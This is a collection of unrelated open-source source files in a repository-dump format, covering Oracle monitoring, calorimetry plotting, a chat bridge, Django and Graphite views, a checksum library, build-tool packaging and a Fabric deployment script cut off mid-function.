for row in servers:
(server_id, host, port, dsn, tags) = row
p = Process(target = check_oracle, args = (host,port,dsn,username,password,server_id,tags))
plist.append(p)
p.start()
#time.sleep(10)
#for p in plist:
# p.terminate()
for p in plist:
p.join()
else:
logger.warning("check oracle: not found any servers")
func.mysql_exec('update oracle_status set connect=0,create_time=now() where create_time<date_sub(now(), interval %s second)' % (min_interval))
func.mysql_exec('DELETE ot FROM oracle_tablespace AS ot, db_servers_oracle AS d where (d.is_delete=1 or d.monitor=0) AND ot.host=d.host AND ot.port=d.port')
func.mysql_exec('DELETE ot FROM oracle_status AS ot, db_servers_oracle AS d where (d.is_delete=1 or d.monitor=0) AND ot.host=d.host AND ot.port=d.port')
#func.mysql_exec('DELETE ds FROM oracle_status AS ds, (SELECT s.id,d.host FROM oracle_status AS s LEFT JOIN db_servers_oracle AS d ON d.is_delete=0 AND d.monitor=1 AND s.host=d.host AND s.port=d.port HAVING d.`host` IS NULL) AS t WHERE ds.id=t.id')
func.mysql_exec('DELETE ds FROM db_status AS ds, (SELECT s.id,d.host FROM db_status AS s LEFT JOIN db_servers_oracle AS d ON d.is_delete=0 AND d.monitor=1 AND s.host=d.host AND s.port=d.port WHERE db_type="oracle" HAVING d.`host` IS NULL) AS t WHERE ds.id=t.id')
logger.info("check oracle controller finished.")
if __name__=='__main__':
igTsNames = ["SYSAUX", "SYSTEM"]
main()
| gpl-3.0 | -3,721,397,332,160,236,000 | 51.386598 | 790 | 0.662698 | false |
johnmgregoire/NanoCalorimetry | plot_pprvsTsubtract20110818.py | 1 | 3566 | import numpy, h5py, os
from PnSC_main import *
from PnSC_h5io import *
from PnSC_math import *
p='C:/Users/JohnnyG/Documents/PythonCode/Vlassak/NanoCalorimetry/20110816_Zr-Hf-B.h5'
h5f=h5py.File(p, mode='r')
ehl=[\
('quadlinheating2_0817', 'cell9_25mAlinquad2_first_1_of_1', 'Zr-B, 1st'),\
('quadlinheating2_0817', 'cell9_25mAlinquad2_second_1_of_1', 'Zr-B, 2nd'),\
('quadlinheating2_0817', 'cell9_25mAlinquad2_third_1_of_1', 'Zr-B, 3rd'), \
#('quadlinheating2', 'pre_25mApluslinquad2_cell16_1_of_1', 'Hf-B, nth'), \
#('quadlinheating2', 'cell11_25malinquad2_1_of_1', 'empty'), \
]
tarrs=[]
pprarrs=[]
for i, (e, h, l) in enumerate(ehl):
hpsdl=CreateHeatProgSegDictList(p, e, h)
T=hpsdl[2]['sampletemperature'][0, :]
ppr=hpsdl[2]['samplepowerperrate'][0, :]
if 0:
pylab.plot(T, ppr*1.e6, label=l)
pylab.xlabel('Temperature (C)')
pylab.ylabel('power per rate ($\mu$J/K)')
pylab.legend(loc=0)
tarrs+=[T]
pprarrs+=[ppr]
def extremesmooth(x, binn=70, SGpts=170, SGorder=3):
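    """Block-average x in bins of `binn` points, smooth the binned curve
    with a Savitzky-Golay filter, then linearly interpolate (extrapolating
    at the edges) back to the original sampling."""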
xb=numpy.array([x[i*binn:(i+1)*binn].mean() for i in range(len(x)//binn)])
xbf=savgolsmooth(xb, nptsoneside=SGpts, order =SGorder)
ia=numpy.arange(binn, dtype='float32')/binn
    xr=numpy.concatenate([ia*(b-a)+a for a, b in zip(xbf[:-1], xbf[1:])])
xr=numpy.concatenate([(xbf[1]-xbf[0])*ia[:binn//2]+xbf[0], xr, (xbf[-1]-xbf[-2])*ia[:binn//2]+xbf[-1]])
xr=numpy.concatenate([xr, (xbf[-1]-xbf[-2])*ia[:len(x)-len(xr)]+xbf[-1]])
return xr
if 1:
x=extremesmooth(pprarrs[0])
y=extremesmooth(pprarrs[1])
z=extremesmooth(pprarrs[2])
xt=tarrs[0]
yt=tarrs[1]
zt=tarrs[2]
tmin=max([t.min() for t in [xt, yt, zt]])
tmax=min([t.max() for t in [xt, yt, zt]])
tinterp=numpy.linspace(tmin, tmax, 2000)
xinterp=numpy.interp(tinterp, xt, x)
yinterp=numpy.interp(tinterp, yt, y)
zinterp=numpy.interp(tinterp, zt, z)
pylab.figure()
for i, (t, a, ai) in enumerate([(xt, x, xinterp), (yt, y, yinterp), (zt, z, zinterp)]):
pylab.subplot(3, 1, i+1)
pylab.plot(tinterp, ai)
pylab.plot(t, a)
pylab.figure()
xsub=xinterp-(zinterp+yinterp)/2.
for i, (a, l) in enumerate([(xinterp, '1st'), ((zinterp+yinterp)/2., 'subsequent')]):
pylab.plot(tinterp, a*1.e6, label=l, lw=2)
#pylab.legend(loc=2)
pylab.xlabel('Temperature (C)', fontsize=14)
pylab.ylabel('Calorimetric Signal ($\mu$J/K)', fontsize=14)
# pylab.text(700, 14, '1st',color='b', ha='left', fontsize=14)
# pylab.text(450, 14, 'subsequent',color='g', ha='right', fontsize=14)
pylab.annotate('1st',(540, 14),xytext=(630, 14),fontsize=14,color='b',arrowprops={'arrowstyle':'->','color':'b'})
pylab.annotate('subsequent',(490, 14),xytext=(380, 14),fontsize=14,color='g',arrowprops={'arrowstyle':'->','color':'g'}, ha='right')
pylab.xlim(0, 1200)
pylab.figure()
pylab.plot([0, 1200], [0, 0], 'k', lw=1)
pylab.plot(tinterp, xsub*1.e6, 'r-', lw=2)
# pylab.annotate(' ',(510, -2),xytext=(510, 0),color='k',arrowprops={'arrowstyle':'simple','color':'k'})
# pylab.annotate(' ',(1010, -14),xytext=(1010, 0),color='k',arrowprops={'arrowstyle':'simple','color':'k'})
#pylab.legend()
pylab.xlabel('Temperature (C)', fontsize=14)
pylab.ylabel('Differential signal ($\mu$J/K)', fontsize=14)
pylab.xlim(0, 1200)
pylab.subplots_adjust(right=.55, top=.5)
print xsub[(tinterp>260)*(tinterp<670)].sum()*(tinterp[1]-tinterp[0])*1.e6
print xsub[tinterp>670].sum()*(tinterp[1]-tinterp[0])*1.e6
pylab.show()
| bsd-3-clause | 3,636,669,032,018,904,600 | 39.988506 | 136 | 0.616938 | false |
felipemontefuscolo/bitme | tactic/bitmex_dummy_tactic.py | 1 | 1028 | from common.quote import Quote
from tactic import TacticInterface, ExchangeInterface, Symbol, OrderCommon, Fill
import pandas as pd
class BitmexDummyTactic(TacticInterface):
"""
    This class is associated with orders issued by Bitmex
"""
def finalize(self) -> None:
pass
def handle_quote(self, quote: Quote) -> None:
pass
def handle_order_completed(self, order: OrderCommon) -> None:
pass
def handle_liquidation(self, pnl: float):
pass
def id(self):
return 'DUMMY'
def initialize(self, exchange: ExchangeInterface, preferences: dict) -> None:
pass
def get_symbol(self) -> Symbol:
pass
def handle_1m_candles(self, candles1m: pd.DataFrame) -> None:
pass
def handle_submission_error(self, failed_order: OrderCommon) -> None:
pass
def handle_fill(self, fill: Fill) -> None:
pass
def handle_cancel(self, order: OrderCommon) -> None:
pass
def handle_trade(self):
pass
| mpl-2.0 | 6,919,429,432,571,960,000 | 21.844444 | 81 | 0.636187 | false |
rmed/wat-bridge | wat_bridge/signals.py | 1 | 3542 | # -*- coding: utf-8 -*-
#
# wat-bridge
# https://github.com/rmed/wat-bridge
#
# The MIT License (MIT)
#
# Copyright (c) 2016 Rafael Medina García <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Signal handlers."""
import sys
from wat_bridge.static import SETTINGS, get_logger
from wat_bridge.helper import get_contact, get_phone, db_get_group
from wat_bridge.tg import tgbot
from wat_bridge.wa import wabot
from telebot import util as tgutil
logger = get_logger('signals')
def sigint_handler(signal, frame):
"""Function used as handler for SIGINT to terminate program."""
sys.exit(0)
def to_tg_handler(sender, **kwargs):
"""Handle signals sent to Telegram.
This will involve sending messages through the Telegram bot.
Args:
phone (str): Phone number that sent the message.
message (str): The message received
"""
phone = kwargs.get('phone')
message = kwargs.get('message', '')
# Check if known contact
contact = get_contact(phone)
chat_id = SETTINGS['owner']
if not contact:
# Unknown sender
output = 'Message from #unknown\n'
output += 'Phone number: %s\n' % phone
output += '---------\n'
output += message
logger.info('received message from unknown number: %s' % phone)
else:
group = db_get_group(contact)
if not group:
# Known sender
output = 'Message from #%s\n' % contact
output += '---------\n'
output += message
else:
# Contact is bound to group
chat_id = group
output = message
logger.info('received message from %s' % contact)
# Deliver message through Telegram
for chunk in tgutil.split_string(output, 3000):
tgbot.send_message(chat_id, chunk)
def to_wa_handler(sender, **kwargs):
"""Handle signals sent to Whatsapp.
This will involve sending messages through the Whatsapp bot.
Args:
contact (str): Name of the contact to send the message to.
message (str): The message to send
"""
contact = kwargs.get('contact')
message = kwargs.get('message')
# Check if known contact
phone = get_phone(contact)
if not phone:
# Abort
tgbot.send_message(
SETTINGS['owner'],
'Unknown contact: "%s"' % contact
)
return
logger.info('sending message to %s (%s)' % (contact, phone))
wabot.send_msg(phone=phone, message=message)
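

# The handler functions above use the blinker-style ``sender, **kwargs``
# signature. A wiring sketch for reference (the signal names 'to_tg' and
# 'to_wa' are assumptions for illustration, not taken from this module):
#
#     from blinker import signal
#     signal('to_tg').connect(to_tg_handler)
#     signal('to_wa').connect(to_wa_handler)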
| mit | -2,279,454,052,211,999,200 | 29.791304 | 80 | 0.661395 | false |
gladgod/zhiliao | zhiliao/galleries/tests.py | 1 | 2128 | from __future__ import unicode_literals
from future.builtins import str
from future.utils import native
import os
from shutil import rmtree
from uuid import uuid4
from zhiliao.conf import settings
from zhiliao.core.templatetags.mezzanine_tags import thumbnail
from zhiliao.galleries.models import Gallery, GALLERIES_UPLOAD_DIR
from zhiliao.utils.tests import TestCase, copy_test_to_media
class GalleriesTests(TestCase):
def test_gallery_import(self):
"""
Test that a gallery creates images when given a zip file to
import, and that descriptions are created.
"""
zip_name = "gallery.zip"
copy_test_to_media("zhiliao.core", zip_name)
title = native(str(uuid4())) # i.e. Py3 str / Py2 unicode
gallery = Gallery.objects.create(title=title, zip_import=zip_name)
images = list(gallery.images.all())
self.assertTrue(images)
self.assertTrue(all([image.description for image in images]))
# Clean up.
rmtree(os.path.join(settings.MEDIA_ROOT,
GALLERIES_UPLOAD_DIR, title))
def test_thumbnail_generation(self):
"""
Test that a thumbnail is created and resized.
"""
try:
from PIL import Image
except ImportError:
return
image_name = "image.jpg"
size = (24, 24)
copy_test_to_media("zhiliao.core", image_name)
thumb_name = os.path.join(settings.THUMBNAILS_DIR_NAME, image_name,
image_name.replace(".", "-%sx%s." % size))
thumb_path = os.path.join(settings.MEDIA_ROOT, thumb_name)
thumb_image = thumbnail(image_name, *size)
self.assertEqual(os.path.normpath(thumb_image.lstrip("/")), thumb_name)
self.assertNotEqual(os.path.getsize(thumb_path), 0)
thumb = Image.open(thumb_path)
self.assertEqual(thumb.size, size)
# Clean up.
del thumb
os.remove(os.path.join(settings.MEDIA_ROOT, image_name))
os.remove(os.path.join(thumb_path))
rmtree(os.path.join(os.path.dirname(thumb_path)))
| bsd-3-clause | 8,303,072,543,092,241,000 | 37 | 79 | 0.634868 | false |
Caylo/easybuild-framework | easybuild/toolchains/linalg/libsci.py | 1 | 3408 | ##
# Copyright 2014-2016 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://www.vscentrum.be),
# Flemish Research Foundation (FWO) (http://www.fwo.be/en)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild. If not, see <http://www.gnu.org/licenses/>.
##
"""
Support for Cray's LibSci library, which provides BLAS/LAPACK support.
cfr. https://www.nersc.gov/users/software/programming-libraries/math-libraries/libsci/
:author: Petar Forai (IMP/IMBA, Austria)
:author: Kenneth Hoste (Ghent University)
"""
import os
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.toolchain.linalg import LinAlg
CRAY_LIBSCI_MODULE_NAME = 'cray-libsci'
class LibSci(LinAlg):
"""Support for Cray's LibSci library, which provides BLAS/LAPACK support."""
# BLAS/LAPACK support
# via cray-libsci module, which gets loaded via the PrgEnv module
# see https://www.nersc.gov/users/software/programming-libraries/math-libraries/libsci/
BLAS_MODULE_NAME = [CRAY_LIBSCI_MODULE_NAME]
# no need to specify libraries, compiler driver takes care of linking the right libraries
# FIXME: need to revisit this, on numpy we ended up with a serial BLAS through the wrapper.
BLAS_LIB = []
BLAS_LIB_MT = []
LAPACK_MODULE_NAME = [CRAY_LIBSCI_MODULE_NAME]
LAPACK_IS_BLAS = True
BLACS_MODULE_NAME = []
SCALAPACK_MODULE_NAME = []
def _get_software_root(self, name):
"""Get install prefix for specified software name; special treatment for Cray modules."""
if name == 'cray-libsci':
# Cray-provided LibSci module
env_var = 'CRAY_LIBSCI_PREFIX_DIR'
root = os.getenv(env_var, None)
if root is None:
raise EasyBuildError("Failed to determine install prefix for %s via $%s", name, env_var)
else:
self.log.debug("Obtained install prefix for %s via $%s: %s", name, env_var, root)
else:
root = super(LibSci, self)._get_software_root(name)
return root
def _set_blacs_variables(self):
"""Skip setting BLACS related variables"""
pass
def _set_scalapack_variables(self):
"""Skip setting ScaLAPACK related variables"""
pass
def definition(self):
"""
Filter BLAS module from toolchain definition.
The cray-libsci module is loaded indirectly (and versionless) via the PrgEnv module,
and thus is not a direct toolchain component.
"""
tc_def = super(LibSci, self).definition()
tc_def['BLAS'] = []
tc_def['LAPACK'] = []
return tc_def
| gpl-2.0 | 3,152,435,905,276,720,000 | 36.450549 | 104 | 0.681631 | false |
dsparrow27/vortex | src/ds/vortex/nodes/comparison/equalTo.py | 1 | 1290 | from ds.vortex.core import baseNode
from ds.vortex.core import plug as plugs
class EqualToNode(baseNode.BaseNode):
def __init__(self, name):
"""
:param name: str, the name of the node
"""
baseNode.BaseNode.__init__(self, name)
def initialize(self):
baseNode.BaseNode.initialize(self)
self.outputPlug_ = plugs.OutputPlug("output", self)
self.addPlug(self.outputPlug_, clean=True)
self.value1Plug_ = plugs.InputPlug("value1", self, value=0)
self.value2Plug_ = plugs.InputPlug("value2", self, value=0)
self.addPlug(self.value1Plug_, clean=True)
self.addPlug(self.value2Plug_, clean=True)
self.plugAffects(self.value1Plug_, self.outputPlug_)
self.plugAffects(self.value2Plug_, self.outputPlug_)
def compute(self, requestPlug):
baseNode.BaseNode.compute(self, requestPlug=requestPlug)
if requestPlug != self.outputPlug_:
return None
        result = self.value1Plug_.value == self.value2Plug_.value
requestPlug.value = result
requestPlug.dirty = False
return result
def getNode():
"""General function that returns our node, used to get create our node via Ui etc
:return: Node instance
"""
return EqualToNode
| mit | -2,959,725,175,633,095,000 | 32.076923 | 85 | 0.651938 | false |
dkulikovsky/graphite-ch-web | webapp/graphite/events/views.py | 1 | 2767 | import datetime
import time
from django.http import HttpResponse
from django.shortcuts import render_to_response, get_object_or_404
from django.utils.timezone import localtime, now
from graphite.util import json
from graphite.events import models
from graphite.render.attime import parseATTime
from django.core.urlresolvers import get_script_prefix
def to_timestamp(dt):
return time.mktime(dt.timetuple())
class EventEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, datetime.datetime):
return to_timestamp(obj)
return json.JSONEncoder.default(self, obj)
def view_events(request):
if request.method == "GET":
context = { 'events' : fetch(request),
'slash' : get_script_prefix()
}
return render_to_response("events.html", context)
else:
return post_event(request)
def detail(request, event_id):
e = get_object_or_404(models.Event, pk=event_id)
context = { 'event' : e,
'slash' : get_script_prefix()
}
return render_to_response("event.html", context)
def post_event(request):
if request.method == 'POST':
event = json.loads(request.body)
assert isinstance(event, dict)
values = {}
values["what"] = event["what"]
values["tags"] = event.get("tags", None)
values["when"] = datetime.datetime.fromtimestamp(
event.get("when", time.time()))
if "data" in event:
values["data"] = event["data"]
e = models.Event(**values)
e.save()
return HttpResponse(status=200)
else:
return HttpResponse(status=405)
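

# Example of a JSON payload accepted by post_event (illustrative values):
#
#     {"what": "deploy finished",
#      "tags": "release web",
#      "when": 1388534400,
#      "data": "rolled out v1.2"}
#
# "what" is required; "tags", "when" (epoch seconds, defaults to now) and
# "data" are optional.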
def get_data(request):
if 'jsonp' in request.REQUEST:
response = HttpResponse(
"%s(%s)" % (request.REQUEST.get('jsonp'),
json.dumps(fetch(request), cls=EventEncoder)),
content_type='text/javascript')
else:
response = HttpResponse(
json.dumps(fetch(request), cls=EventEncoder),
content_type="application/json")
return response
def fetch(request):
#XXX we need to move to USE_TZ=True to get rid of localtime() conversions
if request.GET.get("from", None) is not None:
time_from = localtime(parseATTime(request.GET["from"])).replace(tzinfo=None)
else:
time_from = datetime.datetime.fromtimestamp(0)
if request.GET.get("until", None) is not None:
time_until = localtime(parseATTime(request.GET["until"])).replace(tzinfo=None)
else:
time_until = now()
tags = request.GET.get("tags", None)
if tags is not None:
tags = request.GET.get("tags").split(" ")
return [x.as_dict() for x in
models.Event.find_events(time_from, time_until, tags=tags)]
| apache-2.0 | 3,258,372,787,531,299,000 | 29.406593 | 86 | 0.633177 | false |
jat255/hyperspy | hyperspy/tests/misc/test_utils.py | 1 | 2016 | # -*- coding: utf-8 -*-
# Copyright 2007-2020 The HyperSpy developers
#
# This file is part of HyperSpy.
#
# HyperSpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# HyperSpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with HyperSpy. If not, see <http://www.gnu.org/licenses/>.
from hyperspy.misc.utils import slugify, parse_quantity, is_hyperspy_signal
from hyperspy import signals
import numpy as np
def test_slugify():
assert slugify('a') == 'a'
assert slugify('1a') == '1a'
assert slugify('1') == '1'
assert slugify('a a') == 'a_a'
assert slugify('a', valid_variable_name=True) == 'a'
assert slugify('1a', valid_variable_name=True) == 'Number_1a'
assert slugify('1', valid_variable_name=True) == 'Number_1'
assert slugify('a', valid_variable_name=False) == 'a'
assert slugify('1a', valid_variable_name=False) == '1a'
assert slugify('1', valid_variable_name=False) == '1'
def test_parse_quantity():
# From the metadata specification, the quantity is defined as
# "name (units)" without backets in the name of the quantity
assert parse_quantity('a (b)') == ('a', 'b')
assert parse_quantity('a (b/(c))') == ('a', 'b/(c)')
assert parse_quantity('a (c) (b/(c))') == ('a (c)', 'b/(c)')
assert parse_quantity('a [b]') == ('a [b]', '')
assert parse_quantity('a [b]', opening = '[', closing = ']') == ('a', 'b')
def test_is_hyperspy_signal():
s = signals.Signal1D(np.zeros((5, 5, 5)))
p = object()
assert is_hyperspy_signal(s) is True
assert is_hyperspy_signal(p) is False
| gpl-3.0 | 5,785,363,726,843,865,000 | 37.037736 | 78 | 0.659722 | false |
blowmage/gcloud-python | gcloud/storage/demo/__init__.py | 1 | 1054 | # Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from gcloud import storage
__all__ = ['create_bucket', 'list_buckets', 'PROJECT_ID']
PROJECT_ID = os.getenv('GCLOUD_TESTS_PROJECT_ID')
def list_buckets(connection):
return list(storage.list_buckets(project=PROJECT_ID,
connection=connection))
def create_bucket(bucket_name, connection):
return storage.create_bucket(bucket_name, PROJECT_ID,
connection=connection)
| apache-2.0 | 5,348,173,973,588,529,000 | 34.133333 | 74 | 0.706831 | false |
vaiski/checksum | src/checksum/checksum.py | 1 | 4815 | # -*- coding: utf-8 -*-
'''
Checksum
========
Provides an extendable checksum calculation and validation library for
different checksum algorithms.
'''
class ChecksumStrategy(object):
'''
An interface class for checksum algorithm classes.
'''
def checksum(self, body):
''' Calculates a checksum for the body string provided. '''
raise NotImplementedError('Checksum calculation is not implemented for'
'this checksum strategy.')
def is_valid(self, value, checksum=None):
'''
Validates a string against the checksum.
This abstract base class provides an elementary checksum validation
method. Advanced validation methods should be implemented in
subclasses when possible.
'''
body = value
if checksum is None:
(body, checksum) = self.split(value)
return self.checksum(body) == checksum
def split(self, value):
'''
Splits the string including a checksum according to the checksum
algorithm used.
'''
raise NotImplementedError('Splitting is not implemented for this '
'checksum strategy.')
def _prepare(self, body):
''' Method to prepare the body string for checksum calculation. '''
return [int(d) for d in str(body)]
class Checksum(object):
'''
Checksum context class. Provides different checksum calculation and
verification algorithms by acting as a factory class.
'''
_strategies = {}
def __init__(self, strategy=None, body=None):
'''
Checksum context class constructor.
        :param strategy: name of the checksum algorithm to use
        :param body: string that the checksum is calculated for
'''
self._strategy = None
self._body = None
self.strategy = strategy
self.body = body
# Setters and getters
# -------------------
@property
def body(self):
''' Getter for the body property. '''
return self._body
@body.setter
def body(self, value):
''' Setter for the body property. '''
if value is not None:
self._body = value
else:
self._body = ''
@property
def strategy(self):
''' Getter for the strategy property. '''
return self._strategy
@strategy.setter
def strategy(self, value):
''' Setter for the strategy property. '''
if value is None:
return
if value in self._strategies:
strategy = self._strategies[value]()
else:
raise NotImplementedError('Checksum strategy %s is not '
'implemented.' % value)
if (isinstance(strategy, ChecksumStrategy) and
type(strategy) != ChecksumStrategy):
self._strategy = strategy
else:
raise TypeError(
'Strategy requires a subclass of ChecksumStrategy.'
' Got instead %s.' % type(strategy))
def checksum(self):
'''
Calculates the checksum using selected algorithm for the body string.
'''
if self.strategy is not None:
return self.strategy.checksum(self._body)
def is_valid(self, value, checksum=None):
'''
        Validates either a string that embeds its own checksum, or a body
        string checked against a separately provided checksum.
'''
if self.strategy is not None:
return self.strategy.is_valid(value, checksum)
def split(self, value):
'''
Splits a string containing a body and a checksum according to the
conventions of selected checksum algorithm.
'''
if self.strategy is not None:
return self.strategy.split(value)
def type(self):
'''
Returns the name of used checksum algorithm.
'''
if self.strategy is not None:
return self.strategy.name
else:
return None
@classmethod
def register_strategy(cls, strategy_cls):
'''
Registers a checksum strategy class in the available checksum
strategies.
'''
strategy = strategy_cls()
if (isinstance(strategy, ChecksumStrategy) and
type(strategy) != ChecksumStrategy):
cls._strategies[strategy_cls.name] = strategy_cls
else:
raise TypeError(
'Strategy requires a subclass of ChecksumStrategy.'
' Got instead %s.' % type(strategy))
@classmethod
def list_strategies(cls):
'''
Lists all the available strategies for checksum calculation.
'''
return cls._strategies.keys()
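# --- Illustrative example (not part of the library) -------------------------
# A minimal sketch of how a concrete strategy could be defined and registered.
# The digit-sum algorithm and the name 'digit_sum' are hypothetical.
#
# class DigitSumStrategy(ChecksumStrategy):
#     name = 'digit_sum'
#
#     def checksum(self, body):
#         # Checksum is the last digit of the sum of the body's digits.
#         return sum(self._prepare(body)) % 10
#
#     def split(self, value):
#         # Convention: the checksum is the final digit of the string.
#         return (value[:-1], int(value[-1]))
#
# Checksum.register_strategy(DigitSumStrategy)
# c = Checksum(strategy='digit_sum')
# c.is_valid('12340')  # True: (1 + 2 + 3 + 4) % 10 == 0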
| mit | -6,618,260,355,587,514,000 | 27.660714 | 79 | 0.580685 | false |
jovencoda/evoca-v2 | evoca_v2/core/migrations/0022_auto_20170820_0036.py | 1 | 1202 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-08-20 00:36
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import uuid
class Migration(migrations.Migration):
dependencies = [
('core', '0021_channel_image'),
]
operations = [
migrations.CreateModel(
name='ChannelTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uniqueID', models.UUIDField(default=uuid.uuid4, editable=False)),
('name', models.CharField(max_length=255)),
('slug', models.SlugField(blank=True, null=True)),
],
),
migrations.AlterField(
model_name='channel',
name='image',
field=models.ImageField(blank=True, null=True, upload_to='static/img/'),
),
migrations.AddField(
model_name='channeltag',
name='related_channel',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_channel', to='core.Channel'),
),
]
| gpl-3.0 | 819,544,230,349,932,200 | 32.388889 | 132 | 0.587354 | false |
skosukhin/spack | var/spack/repos/builtin/packages/r-alsace/package.py | 1 | 2082 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RAlsace(RPackage):
"""Alternating Least Squares (or Multivariate Curve Resolution)
for analytical chemical data, in particular hyphenated data where
the first direction is a retention time axis, and the second a
spectral axis. Package builds on the basic als function from the
ALS package and adds functionality for high-throughput analysis,
including definition of time windows, clustering of profiles,
retention time correction, etcetera."""
homepage = "https://www.bioconductor.org/packages/alsace/"
url = "https://git.bioconductor.org/packages/alsace"
version('1.12.0', git='https://git.bioconductor.org/packages/alsace', commit='1364c65bbff05786d05c02799fd44fd57748fae3')
depends_on('r-als', type=('build', 'run'))
depends_on('r-ptw', type=('build', 'run'))
| lgpl-2.1 | -4,289,728,429,612,582,000 | 47.418605 | 124 | 0.694524 | false |
lancms/lancms2 | fabfile.py | 1 | 5721 | from fabric.api import *
from fabric.colors import green, red
from fabric.contrib import files
import datetime
import os
def _environment ():
env.release = datetime.datetime.now().strftime ("%Y-%m-%d-%H%M%S")
env.project_name = 'lancms2'
# FIXME: hardcoded path:
env.path_home = '/opt/lancms2/'
env.path_root = os.path.join (env.path_home, 'deployment/')
env.path_current = os.path.join (env.path_root, 'current')
env.path_releases = os.path.join (env.path_root, 'releases/')
env.path_full_release = os.path.join (env.path_releases, env.release)
env.path_full_release_local_settings = os.path.join (env.path_full_release, 'lancms2/local_settings.py')
env.path_full_release_local_sqlite = os.path.join (env.path_full_release, 'lancms2.sql')
env.path_apache2_sites_available = '/etc/apache2/sites-available/'
env.filename_apacheconf = 'apache2-wsgi-virtualhost.conf'
env.virenv = 'source %s/virtualenv/bin/activate' % env.path_root
# FIXME: hardcoded user and group:
env.owner_user = 'www-data'
env.owner_group = 'lancms2'
def _upload_and_unpack ():
# local is on local host
local ('bzr export --format=tgz %s.tar.gz' % env.release);
# run is on remote host!
run ('mkdir -p %s' % env.path_full_release)
# put places local file on remote server
put ('%s.tar.gz' % env.release, env.path_releases, mode=0750)
local ('rm -f %s.tar.gz' % env.release)
with cd ('%s' % env.path_releases):
run ('tar -xzf %s.tar.gz' % env.release)
run ('rm %s.tar.gz' % env.release)
print (green ('Uploaded and unpacked'))
def _create_virtualenv ():
with cd ('%s' % env.path_root):
run ('virtualenv virtualenv -p python3')
run ('source %svirtualenv/bin/activate' % env.path_root)
print (green ('Created (or recreated) virtual environment'))
def _set_release_permissions ():
sudo ('chown %s:%s -R %s' % (env.owner_user, env.owner_group, env.path_full_release), shell=False)
sudo ('chmod g+w -R %s' % (env.path_full_release), shell=False)
print (green ('Set permissions for www-data on %s' % env.path_full_release))
def _install_requirements ():
with cd ('%s' % env.path_full_release):
run ('source %svirtualenv/bin/activate; pip install -r requirements.txt' % env.path_root)
print (green ('Installed requirements in virtual environment'))
def _symlink_local_settings ():
path_file = os.path.join (env.path_home, 'LOCAL_SETTINGS.py')
if files.exists (path_file):
run ('ln -s %s %s' % (path_file, env.path_full_release_local_settings))
print (green ('Symlinked local_settings'))
def _symlink_local_sqlite ():
path_file = os.path.join (env.path_home, 'LANCMS2.sql')
if files.exists (path_file):
run ('ln -s %s %s' % (path_file, env.path_full_release_local_sqlite))
print (green ('Symlinked local sqlite'))
def _symlink_current_release ():
if files.exists (env.path_current):
run ('rm -f %s' % env.path_current)
print (red ('Removed symlink for previous release'))
run ('ln -s %s %s' % (env.path_full_release, env.path_current))
print (green ('Symlinked current release %s to %s' % (env.release, env.path_current)))
def _check_hosts ():
if not env.hosts or env.hosts == "":
import sys
print ""
